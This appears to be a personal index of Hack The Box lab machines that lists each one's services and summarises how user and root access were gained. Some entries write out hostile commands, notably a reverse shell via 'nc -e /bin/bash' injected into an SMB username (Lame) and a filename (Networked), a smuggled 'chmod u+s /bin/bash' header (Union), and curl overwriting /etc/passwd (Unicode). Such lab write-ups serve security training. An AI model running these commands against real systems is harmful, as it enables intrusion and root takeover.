HACK THE BOX HISTORY

Hack The Box History is a list of machines, each with a short summary of its most relevant information.

Use the browser’s integrated search (Ctrl+F) to search by the fields you are interested in (e.g. RCE, SQLi, Exploit, MySQL, etc.).


Paper

By : secnigma

Linux – 10.10.11.143 Easy

Linux paper 4.18.0-348.7.1.el8_5.x86_64 #1 SMP Wed Dec 22 13:25:12 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

CentOS Linux 8 – Fedora

Active services:

PORT | SERVICE | VERSION
20 | SSH | OpenSSH
80/443 | HTTP/SSL | Apache httpd 2.4.37 – OpenSSL 1.1.1k – mod_fcgi 2.3.9

User Own:

System Own:


GoodGames

By : TheCyberGeek

Linux – 10.10.11.130 Easy

Debian 4.19.0-18-amd64 Debian 4.19.208-1 x86_64 GNU/Linux

Debian 11 – Bullseye

Active services:

PORT | SERVICE | VERSION
80 | HTTP | Apache httpd 2.4.51

User Own:

  • Login bypassing with SQL Injection (SQLi) and Database Enumeration.
  • Raw-MD5 Password hash.
  • Flask Dashboard v2.0.2 – Server Side Template Injection (SSTI – jinja2).

System Own:

  • Docker.
  • Port Discovery.
  • Leaked Information and password reused.
  • SSH internal connection.
  • Home user directory mounted in Docker.
  • User Pivoting.

SteamCloud

By : felamos

Linux – 10.10.11.133 Easy

Debian 4.19.0-18-amd64 Linux x86_64

Debian – Sid

Active services:

PORT | SERVICE | VERSION
22 | FTP | OpenSSH 7.9p1
2379, 2380 | HTTP | Kubernetes etcd clusters
8443 | SSL/HTTPS | Minikube API
10249, 10250, 10256 | HTTP | Golang net/http server (Go-IPFS json-rpc or InfluxDB API) – Kubelet

User Own:

  • Kubernetes API enumeration – Pods enumeration – kubeletctl (https://github.com/cyberark/kubeletctl) – Node with a pod vulnerable to RCE – Remote Command Execution (RCE) in the pod with kubeletctl – Access to a Docker container.

System Own:


NodeBlog

By : ippsec

Linux – 10.10.11.139 Easy

Active services:

PORT | SERVICE | VERSION
22 | SSH | OpenSSH 8.2p1 Ubuntu 0.3
5000 | HTTP | Node.js

User Own:

System Own:

  • MongoDB active on port 27017.
  • Mongodump enumeration – User credentials
  • Sudoers user privilege – (ALL : ALL) ALL

Pandora

By : TheCyberGeek & dmw0ng

Linux – 10.10.11.136 Easy

Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64

Ubuntu 20.04.3 LTS – Focal

Active services:

PORT | SERVICE | VERSION
22/TCP | SSH | OpenSSH 8.2p1
80/TCP | HTTP | Apache 2.4.41
161/UDP | SNMP | SNMPv1 server; net-snmp SNMPv3 server (public)

User Own:

  • SNMP Enumeration – Clear text credentials for user “Daniel”.

System Own:

  • Local Port Forwarding – Pandora Console v7.ONG.742_FIX_PERL2020 – Unauthenticated SQLi

Backdoor

By : hkabubaker17

Linux – 10.10.11.125 Easy

Ubuntu Linux 5.4.0-80-generic x86_64

Ubuntu 20.04.3 LTS – Focal

Active services:

PORT | SERVICE | VERSION
22 | SSH | OpenSSH 8.2p1 Ubuntu 0.3 (protocol 2.0)
80 | HTTP | Apache 2.4.41 – WordPress 5.8.1
1337 | WASTE | gdbserver

User Own:

System Own:

  • Screen SUID – Screen session activated by root – synchronization with param -X.

Nunchucks

By : TheCyberGeek

Linux – 10.10.11.122 Easy

Linux 5.4.0-86-generic x86_64 GNU/Linux

Ubuntu 20.04.3 LTS – Focal

Active services:

PORT | SERVICE | VERSION
22 | SSH | OpenSSH 8.2p1 4ubuntu0.3 (protocol 2.0)
80 | HTTP | Nginx 1.18.0
443 | SSL/HTTP | Nginx 1.18.0

User Own:

System Own:


Secret

By : z9fr

Linux – 10.10.11.120 Easy

Linux 5.4.0-89-generic x86_64 GNU/Linux

Ubuntu 20.04.3 LTS – Focal

Active services:

PORT | SERVICE | VERSION
22 | SSH | OpenSSH 8.2p1 4ubuntu0.3 (protocol 2.0)
80 | HTTP | Nginx 1.18.0
3000 | HTTP | Node.js

User Own:

  • DUMB API.
  • Json Web Token (JWT).
  • Directory Fuzzing.
  • Source Code analysis – Git Project.
  • Remote Command Execution (RCE) – Exec Function.

System Own:

  • Executable with SUID permission.
  • C programming.
  • Function prctl(PR_SET_DUMPABLE, 1) available – Abusing Core Dump – Killing BUS program.
  • Generate crash file in /var/crash.
  • Read crash file with apport-unpack to read privileged files.

Antique

By : MrR3boot

Linux – 10.10.11.107 Easy

Linux antique 5.13.0-051300-generic #202106272333 SMP Sun Jun 27 23:36:43 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 20.04.3 LTS – Focal

Active services:

PORT | SERVICE | VERSION
23/TCP | telnet | ?
161/UDP | SNMP | SNMP

User Own:

  • SNMP Enumeration – snmpwalk – Get hexadecimal code from BIT param.
  • Decoded Hexadecimal – Obtain a password – Access to telnet service – Exec function enabled.

System Own:


Validation

By : ippsec

Linux – 10.10.11.107 Easy

Linux validation 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64 GNU/Linux

Debian GNU/Linux 11 – Bullseye

Active services:

PORT | SERVICE | VERSION
22 | SSH | OpenSSH 8.2p1
80 | HTTP | Apache httpd 2.4.48
4566 | HTTP | nginx
8080 | HTTP | nginx

User Own:

System Own:

  • PHP File with root credentials.

Horizontall

By : wail99

Linux – 10.10.11.105 Easy

Linux horizontall 4.15.0-154-generic #161-Ubuntu SMP Fri Jul 30 13:04:17 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 18.04.5 LTS – Bionic

Active services:

PORT | SERVICE | VERSION
22 | SSH | OpenSSH 7.6p1
80 | HTTP | nginx 1.14.0

User Own:

  • Virtual hosting.
  • Directory Fuzzing – Find subdomain with an API.
  • Strapi 3.0.0-beta.17.4 (Open source Node.js CMS) – Remote Command Execution (RCE) – (https://www.exploit-db.com/exploits/50239) – Access as “strapi” user.

System Own:


Spectra

By : egre55

Others – 10.10.10.229 Easy

Linux spectra 5.4.66+ #1 SMP Tue Dec 22 13:39:49 UTC 2020 x86_64 AMD EPYC 7302P 16-Core Processor AuthenticAMD GNU/Linux

ChromeOS

Active services:

PORT | SERVICE | VERSION
22 | SSH | OpenSSH 8.1
80 | HTTP | nginx 1.17.4
3306 | MYSQL | MySQL

User Own:

  • Virtual Hosting.
  • WordPress 5.4.2 / PHP 5.6.40.
  • WordPress configuration file (wp-config) – Directory Listing – Access to the WordPress administrator – Remote Command Execution (RCE) through a PHP template file – Access as “nginx” user.
  • System enumeration – File with credentials in an etc folder – Access as “katie” user.

System Own:

  • Sudoers user privilege – (ALL) SETENV: NOPASSWD: /sbin/initctl – Modification of a service configuration file to execute commands as root.

Admirer

By : polarbearer & GibParadox

Linux – 10.10.10.187 Easy

Linux admirer 4.9.0-12-amd64 #1 SMP Debian 4.9.210-1 (2020-01-20) x86_64 GNU/Linux

Devuan GNU/Linux 2.1 – ascii

Active services:

PORT | SERVICE | VERSION
21 | FTP | vsftpd 3.0.3
22 | SSH | OpenSSH 7.4p1 (protocol 2.0)
80 | HTTP | Apache httpd 2.4.25

User Own:

  • Robots.txt disallowed directory – File Fuzzing – Find a credentials file – Access to the FTP server – File server configuration.
  • Adminer Database 4.6.2 – Creating our own database to exploit the vulnerability (https://www.foregenix.com/blog/serious-vulnerability-discovered-in-adminer-tool) – Local File Inclusion (LFI) using “LOAD DATA LOCAL” – Obtain user “waldo” credentials to connect via SSH – Access as user “waldo”.

System Own:

  • Sudoers user privilege – (ALL) SETENV: /opt/scripts/admin_tasks.sh – Ability to set environment variables.
  • Python Library Hijacking – shutil.py.
  • Modify the user Python path and execute the script – sudo PYTHONPATH=/tmp /opt/scripts/admin_tasks.sh

Traceback

By : Xh4H

Linux – 10.10.10.181 Easy

Linux traceback 4.15.0-58-generic #64-Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 18.04.3 LTS – bionic

Active services:

PORT | SERVICE | VERSION
22 | SSH | OpenSSH 7.6p1 (protocol 2.0)
80 | HTTP | Apache httpd 2.4.29

User Own:

  • Page source analysis – PHP Shell backdoor – Remote Command Execution (RCE) – (https://github.com/TheBinitGhimire/Web-Shells) – Access as “webadmin” user.
  • Sudoers user privilege – (sysadmin) NOPASSWD: /home/sysadmin/luvit – User “webadmin” can run a Lua binary as user “sysadmin” – Executing os.execute('/bin/bash') in the Lua interface – Pivoting – Access as “sysadmin” user.

System Own:

  • MOTD file in the etc folder whose owner is “root” and group owner is “sysadmin” – This MOTD has a header file that executes an “echo” when a user logs in by SSH – Add an authorized key to the “sysadmin” user’s .ssh path – Modification of the header file to introduce a reverse shell – Access as “root” user.

OpenAdmin

By : del_KZx497Ju

Linux – 10.10.10.171 Easy

Linux openadmin 4.15.0-70-generic #79-Ubuntu SMP Tue Nov 12 10:36:11 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 18.04.3 LTS – bionic

Active services:

PORT | SERVICE | VERSION
22 | SSH | OpenSSH 7.6p1 (protocol 2.0)
80 | HTTP | Apache httpd 2.4.29

User Own:

  • Directory fuzzing.
  • OpenNetAdmin – v18.1.1 – Remote Command Execution (RCE) – (https://github.com/amriunix/ona-rce) – Access as “www-data” user.
  • MySQL credentials in a database config PHP file – Password for “jimmy” user.
  • Site available on port 52846 – assignUserID to user “joanna” – Creating an evil PHP file to execute commands as “joanna” user – Getting joanna’s encrypted id_rsa – ssh2john – Access as “joanna” user.

System Own:


Traverxec

By : jkr

Linux – 10.10.10.165 Easy

Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64 GNU/Linux

Debian GNU/Linux 10 – buster

Active services:

PORT | SERVICE | VERSION
22 | SSH | OpenSSH 7.9p1 (protocol 2.0)
80 | HTTP | nostromo 1.9.6

User Own:

System Own:


Postman

By : TheCyberGeek

Linux – 10.10.10.160 Easy

Linux Postman 4.15.0-58-generic #64-Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 18.04.3 LTS – bionic

Active services:

PORT | SERVICE | VERSION
22 | SSH | OpenSSH 7.6p1 (protocol 2.0)
80 | HTTP | Apache httpd 2.4.29
6379 | REDIS | Redis key-value store 4.0.9
10000 | HTTP | MiniServ 1.910 (Webmin)

User Own:

System Own:


Networked

By : guly

Linux – 10.10.10.146 Easy

Linux networked.htb 3.10.0-957.21.3.el7.x86_64 #1 SMP Tue Jun 18 16:35:19 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

CentOS Linux 7 – rhel fedora

Active services:

PORT | SERVICE | VERSION
22 | SSH | OpenSSH 7.4 (protocol 2.0)
80 | HTTP | Apache httpd 2.4.6 / PHP 5.4.16

User Own:

  • Information leaked – Directory Fuzzing.
  • PHP code downloadable – Code analysis.
  • Image file upload capability.
  • Upload an evil PHP file inside an image file – Remote Command Execution (RCE) – Access as user “apache”.
  • PHP script executed by user “guly” periodically (/home/guly/) – Uses the exec() function to run an rm command – Adding a command into the filename with: touch ‘; nc -c bash IP PORT’ – Access as user “guly”.

System Own:


Safe

By : gh0stm5n

Linux – 10.10.10.147 Easy

Linux safe 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1 (2019-04-12) x86_64 GNU/Linux

Debian Linux 9 – stretch

Active services:

PORT | SERVICE | VERSION
22 | SSH | OpenSSH 7.4p1 (protocol 2.0)
80 | HTTP | Apache httpd 2.4.25
1337 | UNKNOWN | UNKNOWN

User Own:

  • Web enumeration – Information Leakage
  • Script running in port 1337 – 64-bit Executable binary downloadable – Reverse engineering – Code analysis – Buffer Overflow (BOF) [Remote]:
    • Use function system(“/usr/bin/uptime”)
    • NX Enabled.
    • ROP attack.

System Own:

  • KeePass password database in user home “MyPasswords.kdbx”.
  • JPG images in user home, possible keyfiles for KeePass.
  • KeePass brute force – keepass2john -k keyFileImage .kdbx – KeePass password.
  • Root password in the KeePass database.

Haystack

By : JoyDragon

Linux – 10.10.10.115 Easy

Linux haystack 3.10.0-957.1.3.el7.x86_64 #1 SMP Thu Nov 29 14:49:43 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

CentOS Linux 7 – rhel fedora

Active services:

PORT | SERVICE | VERSION
22 | SSH | OpenSSH 7.4 (protocol 2.0)
80 | HTTP | nginx 1.12.2
9200 | HTTP | ElasticSearch 6.4.2

User Own:

System Own:

  • Logstash – Files Input.conf -> Filter.conf -> Output.conf in /etc/logstash/conf.d – Every 10 seconds “root” executes a command located in /opt/kibana/ with name logstash_*.

Writeup

By : jkr

Linux – 10.10.10.138 Easy

Linux writeup 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64 GNU/Linux

Devuan GNU/Linux 2.1 – ascii

Active services:

PORT | SERVICE | VERSION
22 | SSH | OpenSSH 7.4p1 (protocol 2.0)
80 | HTTP | Apache httpd 2.4.45

User Own:

System Own:

  • System process enumeration (PSPY) – (https://github.com/DominicBreuker/pspy)
  • Shell script executed by root from the MOTD – Uses “uname” from a relative path – The script is executed as a welcome message when a user successfully logs in via SSH.
  • User “jkr” in “staff” group – Can write to “/usr/local”.
  • Path Hijacking – cp an evil uname to /usr/local/bin.

SwagShop

By : ch4p

Linux – 10.10.10.140 Easy

Linux swagshop 4.4.0-146-generic #172-Ubuntu SMP Wed Apr 3 09:00:08 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 16.04.6 LTS – xenial

Active services:

PORT | SERVICE | VERSION
22 | SSH | OpenSSH 7.2p2 (protocol 2.0)
80 | HTTP | Apache httpd 2.4.18

User Own:

System Own:

  • User “www-data” in sudo group – Sudoers user privilege NOPASSWD: /usr/bin/vi /var/www/html/*
  • Set the variable Shell=/bin/bash inside vi and execute it.

FriendZone

By : askar

Linux – 10.10.10.123 Easy

Linux FriendZone 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 18.04.1 LTS – bionic

Active services:

PORT | SERVICE | VERSION
21 | FTP | vsftpd 3.0.3
22 | SSH | OpenSSH 7.6p1 (protocol 2.0)
53 | DOMAIN | ISC BIND 9.11.3
80 | HTTP | Apache httpd 2.4.29
139 | NETBIOS-SSN | Samba smbd 3.X – 4.X
443 | SSL/HTTP | Apache httpd 2.4.29
445 | NETBIOS-SSN | Samba smbd 4.7.6

User Own:

  • Virtual Hosting.
  • DNS zone transfer attack (AXFR). Subdomain Enumeration.
  • SMB Enumeration – Disk share with READ,WRITE permissions on path /etc/Development.
  • Directory Path Traversal Into a PHP script – Remote Command Execution (RCE) – access as “www-data” user.
  • Credentials into a “.conf” file – access as “friend” user.

System Own:

  • System process enumeration.
  • Python script executed by root periodically (/opt/server_admin/reporter.py).
  • Python Library Hijacking – OS Library – Permissions 777 to /usr/lib/python2.7/os.py

Help

By : cymtrick

Linux – 10.10.10.153 Easy

Linux 4.4.0-116-generic #140-Ubuntu x86_64 GNU/Linux

Ubuntu 16.04.5 LTS – xenial

Active services:

PORT | SERVICE | VERSION
22 | SSH | OpenSSH 7.2p2 (protocol 2.0)
80 | HTTP | Apache httpd 2.4.18
3000 | HTTP | Node.js Express framework

User Own:

System Own:


Teacher

By : Gioo

Linux – 10.10.10.153 Easy

Linux 4.9.0-8-amd64 Debian 4.9.110-3+deb9u6 x86_64 GNU/Linux

Debian GNU/Linux 9.5 – stretch

Active services:

PORT | SERVICE | VERSION
80 | HTTP | Apache httpd 2.4.25

User Own:

  • Virtual Hosting.
  • Source code analysis – HTML.
  • Information leaked inside a supposed image file.
  • Directory Fuzzing.
  • Moodle.
  • Brute force (password).
  • MySQL – MariaDB (10.1.26-MariaDB-0+deb9u1) – Database inspection – MD5 Pass.

System Own:

  • System enumeration.
  • Bash script executed by root periodically (/usr/bin/backup.sh)
  • Backup of user home folder with Chmod 777 -R.
  • Symbolic link from root directory.

Irked

By : MrAgent

Linux – 10.10.10.117 Easy

Linux 3.16.0-6-686-pae #1 SMP Debian 3.16.56-1+deb8u1 (2018-05-08) i686 GNU/Linux

Debian 8.10 – jessie

Active services:

PORT | SERVICE | VERSION
22 | SSH | OpenSSH 6.7p1 (protocol 2.0)
80 | HTTP | Apache httpd 2.4.10
111 | RPCBIND | RPC
6697 | IRC | UnrealIRCd
8067 | IRC | UnrealIRCd
52182 | ? | ?
65534 | IRC | UnrealIRCd

User Own:

System Own:

  • SUID script.

Curling

By : L4mpje

Linux – 10.10.10.150 Easy

Active services:

PORT | SERVICE | VERSION
22 | SSH | OpenSSH 7.6p1 4ubuntu0.5 (protocol 2.0)
80 | HTTP | Apache httpd 2.4.29 – Joomla

User Own:

  • Information Leaked.
  • Base64-encoded password.
  • Creating an evil PHP file into template – Remote Command Execution (RCE).
  • User Password file within TarFile within Bzip2 within p7zip within Gzip within bzip2 within Hexadecimal-encoded file.

System Own:

  • Modification of /etc/passwd with curl using the “output” parameter, in a script located in the user’s admin-area folder that is executed periodically by the root user. (Pivoting)

Frolic

By : Felamos

Linux – 10.10.10.111 Easy

Ubuntu 4.4.0-116-generic i686 athlon i686 GNU/Linux

Active services:

PORT | SERVICE | VERSION
22 | SSH | OpenSSH 7.2p2
139 | NETBIOS-SSN | Samba smbd 3.X – 4.X
445 | NETBIOS-SSN | Samba smbd 4.3.11-Ubuntu
1880 | Node-RED | Node.js
9999 | HTTP | nginx 1.10.3

User Own:

  • Source code leaks.
  • Ook! – Esoteric programming language.
  • Brute force in zip file.
  • Base64 and Hexadecimal decode.
  • BrainFuck – Esoteric programming language.
  • phpinfo() – Information Leakage.
  • PlaySMS 1.4 – Remote Code Execution (RCE) (CVE-2017-9101) – (https://www.exploit-db.com/exploits/42044).

System Own:

  • SUID binary.
  • Buffer Overflow:
    • NX Enabled
    • ASLR Disabled

Blocky

By : Arrexel

Linux – 10.10.10.37 Easy

Linux Blocky 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 16.04.2 LTS – xenial

Active services:

PORT | SERVICE | VERSION
21 | FTP | ProFTP 1.3.5a
22 | SSH | OpenSSH 7.2p2 (protocol 2.0)
80 | HTTP | Apache httpd 2.4.7
25565 | MINECRAFT SERVER | Minecraft 1.11.2

User Own:

  • User enumeration in post author (notch).
  • Directory Fuzzing.
  • Credentials in a “.class” file within a “.jar” file.
  • Reused credentials for the “notch” user via SSH.
  • [Alternative] Reused credentials for the phpMyAdmin “root” user:
    • Change password user notch to access wordpress administration panel.
    • Remote Command Execution (RCE) into php template file – access as “www-data” user.

System Own:


Bank

By : makelarisjr

Linux – 10.10.10.29 Easy

Linux bank 4.4.0-79-generic #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017 i686 athlon i686 GNU/Linux

Ubuntu 14.04.5 LTS – trusty

Active services:

PORT | SERVICE | VERSION
22 | SSH | OpenSSH 6.6.1p1
53 | DOMAIN | ISC BIND 9.9.5
80 | HTTP | Apache httpd 2.4.7

User Own:

  • Virtual Hosting.
  • Directory Fuzzing.
  • Directory Listing.
  • Credentials in a “.acc” file.
  • Upload an evil php file (PHP 5.5.9) – Remote Command Execution (RCE). **[DEBUG] I added the file extension .htb to execute as php for debugging purposes only**.

System Own:

  • SUID File (/var/htb/emergency) allows you to run a shell as root user.
  • [Alternative] File /etc/passwd with write permission for other users.

Beep

By : ch4p

Linux – 10.10.10.7 Easy

Linux beep 2.6.18-238.12.1.el5 #1 SMP Tue May 31 13:23:01 EDT 2011 i686 athlon i386 GNU/Linux

Active services:

PORT | SERVICE | VERSION
22 | SSH | OpenSSH 4.3 (protocol 2.0)
25 | SMTP | Postfix smtpd
80 | HTTP | Apache httpd 2.2.3
110 | POP3 | Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
111 | RPCBIND | RPC
143 | IMAP | Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
443 | SSL/HTTP | Apache httpd 2.2.3
878 | RPC | RPC
993 | SSL/IMAP | Cyrus imapd
995 | POP3 | Cyrus pop3d
3306 | MYSQL | ?
4190 | SIEVE | Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445 | HYLAFAX | HylaFAX 4.3.10
5038 | ASTERISK | Asterisk Call Manager 1.1
10000 | HTTP | MiniServ 1.570 (Webmin httpd)

User Own:

*IMPORTANT* To access the web resources it is necessary to enable TLS 1.0 in Firefox: https://support.mozilla.org/en-US/questions/1101896

  • Elastix – Local File Inclusion (LFI) (https://www.exploit-db.com/exploits/37637).
  • Credentials in plain text into /etc/amportal.conf.
  • vTiger CRM 5 – Upload an evil PHP file – Remote Command Execution (RCE) – System access as “asterisk” user.
  • [Alternative] Webmin – Shellshock attack – System access as “root” user.
  • [Alternative] Password reuse for SSH access as root user.

System Own:

  • [asterisk] – Sudoers multiple privileges as root user:
    • NOPASSWD: /sbin/shutdown
    • NOPASSWD: /usr/bin/nmap -> https://gtfobins.github.io/gtfobins/nmap/#sudo
    • NOPASSWD: /usr/bin/yum
    • NOPASSWD: /bin/touch
    • NOPASSWD: /bin/chmod -> sudo chmod u+s /bin/bash; bash -p
    • NOPASSWD: /bin/chown -> https://gtfobins.github.io/gtfobins/chown/#sudo
    • NOPASSWD: /sbin/service -> sudo service ../../../bin/bash
    • NOPASSWD: /sbin/init
    • NOPASSWD: /usr/sbin/postmap
    • NOPASSWD: /usr/sbin/postfix
    • NOPASSWD: /usr/sbin/saslpasswd2
    • NOPASSWD: /usr/sbin/hardware_detector
    • NOPASSWD: /sbin/chkconfig
    • NOPASSWD: /usr/sbin/elastix-helper

Lame

By : ch4p

Linux – 10.10.10.3 Easy

Linux lame 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

Ubuntu 8.04 – hardy

Active services:

PORT | SERVICE | VERSION
21 | FTP | vsftpd 2.3.4 (Anonymous FTP login allowed)
22 | SSH | OpenSSH 4.7p1 (protocol 2.0)
139 | NETBIOS-SSN | Samba smbd 3.0.20-Debian
445 | NETBIOS-SSN | Samba smbd 3.0.20-Debian
3632 | DISTCCD | distccd v1

User Own / System Own:

  • Smbclient – protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED:
    • --option="client min protocol=NT1"
  • Remote Command Execution (RCE):
    • Use the username /=`nohup + command in the SMB login:
-c 'logon "/=`nohup nc -e /bin/bash IP PORT`"'
smbclient //10.10.10.3/tmp -N --option="client min protocol=NT1" -c 'logon "/=`nohup nc -e /bin/bash IP PORT`"'

BackendTwo

By : ippsec

Linux – 10.10.11.162 Medium

Linux BackendTwo 5.4.0-77-generic #86-Ubuntu SMP Thu Jun 17 02:35:03 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 20.04.4 LTS – Focal

Active services:

PORT | SERVICE | VERSION
22 | SSH | OpenSSH 8.2p1
80 | HTTP | uvicorn

User Own:

  • Directory Fuzzing.
  • Uvicorn API – JSON data – User Enumeration.
  • Json Web Token (JWT).
  • FastAPI 0.1.0 OAS3 Docs – Mass assignment attack (MAA).
  • Local File Read with API.
  • System process enumeration – Find the uvicorn process PID.
  • Get the JWT secret from the API config files – Modifying the user JWT.
  • Abusing API functions – Download API code files – Upload modified .py files with a reverse shell – Access as “htb” user.

System Own:

  • Find user htb password in auth.log.
  • PAM-Wordle configured – A mini game about guessing a word to get sudoers permissions – PAM files found in pam.d/sudo – List of words found in a file in the binary strings – Find the word “ipsec”.
  • Sudoers user privilege (ALL : ALL) ALL

Backend

By : ippsec

Linux – 10.10.11.161 Medium

Linux Backend 5.4.0-77-generic #86-Ubuntu SMP Thu Jun 17 02:35:03 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 20.04.4 LTS – Focal

Active services:

PORT | SERVICE | VERSION
22 | SSH | OpenSSH 8.2p1
80 | HTTP | uvicorn

User Own:

  • Directory Fuzzing.
  • Uvicorn API – JSON data – User Enumeration.
  • Json Web Token (JWT).
  • FastAPI 0.1.0 OAS3 Docs – Modifying the admin user password with an API function.
  • Get the JWT secret from the API configuration files – Modifying the admin user’s JWT to add the debug field.
  • Executing commands with an API function – Reverse shell – Access as “htb” user.

System Own:

  • Root password into auth.log.

Ransom

By : ippsec

Linux – 10.10.11.153 Medium

Linux ransom 5.4.0-77-generic #86-Ubuntu SMP Thu Jun 17 02:35:03 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 20.04.4 LTS – Focal

Active services:

PORT | SERVICE | VERSION
22 | SSH | OpenSSH 8.2p1
80 | HTTP | Apache 2.4.41

User Own:

System Own:

  • Hard-coded root password into the web login access php code.

Epsilon

By : MrR3boot

Linux – 10.10.11.134 Medium

Linux epsilon 5.4.0-97-generic #110-Ubuntu SMP Thu Jan 13 18:22:13 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 20.04.3 LTS – Focal

Active services:

PORT | SERVICE | VERSION
22 | SSH | OpenSSH 8.2p1
80 | HTTP | Apache 2.4.41
5000 | HTTP | Werkzeug httpd 2.0.2 (Python 3.8.10)

User Own:

  • Directory fuzzing.
  • /.git/ folder – Using GitHack to download the repository (https://github.com/OwenChia/githack).
  • Obtain AWS access keys from a Git commit – Get a secret key from lambda functions with the aws tool.
  • Creating a JWT for the “admin” user with the secret found.
  • Bypass login panel using the JWT as an auth session cookie.
  • Server Side Template Injection (SSTi – jinja2) – Remote Command Execution (RCE) – access as “tom” user.

System Own:

  • System enumeration with PSPY.
  • Cron – Bash script executed by root periodically – /usr/bin/backup.sh – Using TAR command with “-h” param to follow symlinks.
  • Create an evil script to steal root’s id_rsa with a symlink.

Flustered

By : polarbearer

Linux – 10.10.11.131 Medium

Linux flustered 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64 GNU/Linux

Debian GNU/Linux 10 – buster

Active services:

PORT | SERVICE | VERSION
22 | SSH | OpenSSH 7.9p1
80 | HTTP | nginx 1.14.2
111 | RPCBIND | RPC 2-4
3128 | HTTP-PROXY | Squid http proxy 4.6
24007 | GLUSTERFS | Gluster File System
49152 | SSL | ?
49153 | RPCBIND | RPC

User Own:

  • GlusterFS Enumeration – Mounting Volume1 into the local file system – MySQL /var/lib files – MariaDB 10.3.31 – Getting the Squid proxy user & password.
  • Access to Squid Proxy using curl --proxy.
  • Directory fuzzing through the proxy.
  • Leaked app Python code – Flask Server Side Template Injection (SSTi – jinja2) – Remote Command Execution (RCE) – Access as “www-data” user.
  • Obtaining GlusterFS certs to mount Volume2 into the local file system – Modifying the SSH authorized key – Access as “jennifer” user inside a Docker container.

System Own:

  • Port Discovery – Open port 10000 – SSH Local Port Forwarding – Microsoft Azure Storage – Get Azure Key from a backup – Connect to Azure Storage with a Local Storage Emulator – Get root id_rsa.

Timing

By: irogir

Linux – 10.10.11.135 Medium

Linux timing 4.15.0-147-generic #151-Ubuntu SMP Fri Jun 18 19:21:19 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 18.04.6 LTS – Bionic

Active services:

PORT | SERVICE | VERSION
22 | SSH | OpenSSH 7.6p1
80 | HTTP | Apache 2.4.29

User Own:

  • Fuzzing php files.
  • Local File Inclusion (LFI) – PHP wrappers Base64 (php://filter/convert.base64-encode/resource=file) – (https://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity#base64-1) – Downloading PHP web source code.
  • PHP code analysis.
  • Compute filename as a function of time.
  • Uploaded php code into a jpg image – Remote command Execution (RCE).
  • Getting a zip file with a git project from web server – Get db credentials from a commit.
  • Reusing password for access to SSH as “aaron” user.

System Own:

  • Sudoers user privilege – (ALL) NOPASSWD: /usr/bin/netutils – Creating symbolic links to modify files with root privileges.

Union

By: ippsec

Linux – 10.10.11.128 Medium

Linux union 5.4.0-77-generic #86-Ubuntu SMP Thu Jun 17 02:35:03 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 20.04.3 LTS – Focal

Active services:

PORT | SERVICE | VERSION
80 | HTTP | nginx 1.18.0

User Own:

  • PHP files fuzzing.
  • SQL injection (SQLi) – Error based, using the UNION operator:
    • Enumerate the database to find a flag which enables SSH access for our IP.
    • Using load_file to read a PHP config file to get database credentials for the “uhc” user.
  • Reusing password for access to SSH as “uhc” user.

System Own:

  • PHP file Firewall.php analysis.
  • Abusing the X-Forwarded-For header to execute commands as “www-data” user – Remote command execution (RCE).
  • Sudoers www-data privilege – (ALL : ALL) NOPASSWD: ALL
  • (X-FORWARDED-FOR: 1.1.1.1; sudo chmod u+s /bin/bash;)

Unicode

By: webspl01t3r

Linux – 10.10.11.126 Medium

Linux code 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 20.04.3 LTS – Focal

Active services:

PORT | SERVICE | VERSION
22 | SSH | OpenSSH 8.2p1
80 | HTTP | nginx 1.18.0

User Own:

System Own:

  • Sudoers user privilege – (root) NOPASSWD: /usr/bin/treport
  • Decompile treport binary using pyinstxtractor (https://github.com/LucifielHack/pyinstxtractor) and pycdc (https://github.com/zrax/pycdc).
  • Abusing the curl -o param to modify the passwd file – {IP/passwd,-o,/etc/passwd}
  • [Alternative] Add your id_rsa.pub to root’s authorized_key – {IP/id_rsa.pub,-o,/root/.ssh/authorized_key}

Shibboleth

By: knightmare & mrb3n

Linux – 10.10.11.124 Medium

Linux shibboleth 5.4.0-89-generic #100-Ubuntu SMP Fri Sep 24 14:50:10 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 20.04.1 LTS – Focal

Active services:

PORT | SERVICE | VERSION
80/TCP | HTTP | Apache httpd 2.4.41
